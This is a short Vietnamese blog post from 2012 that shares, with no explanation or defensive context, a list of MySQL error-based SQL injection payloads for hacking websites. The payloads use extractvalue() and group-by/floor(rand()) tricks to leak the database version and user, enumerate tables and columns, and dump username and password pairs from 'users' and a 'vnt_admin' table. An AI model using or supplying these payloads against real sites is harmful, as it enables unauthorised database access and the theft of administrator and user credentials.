Chủ Nhật, 1 tháng 7, 2012

Share một số câu lệnh dùng để hack SQL Injection


' or 1 group by concat((select version()  limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
' or 1 group by concat((select table_name fRom information_schema.tables limit 17,1),floor(rand(0)*2)) having min(0) or 1 -- 1

========================
null and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))--
null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 85,1)))--
null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 160,1)))--
null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1050,1)))--
null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users)))--

======================
Get Tables:

/*!And(Select 1 From(Select Count(*),Concat(CHAR (124),(Select substr(Group_Concat(table_name),1,145 )From Information_Schema.Tables where table_schema=database()),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)*/-- -
Get Columns: /*!And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select substr(Group_Concat(column_name),1,100) From Information_Schema.columns where table_schema=database()and table_name=CHAR(118, 110, 116, 95, 97, 100, 109, 105, 110)),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)*/-- -
Get Data: /*!And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select substr(Group_Concat(UserName,0x2f,Password),1,140 ) From vnt_admin),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)*/-- -

Không có nhận xét nào: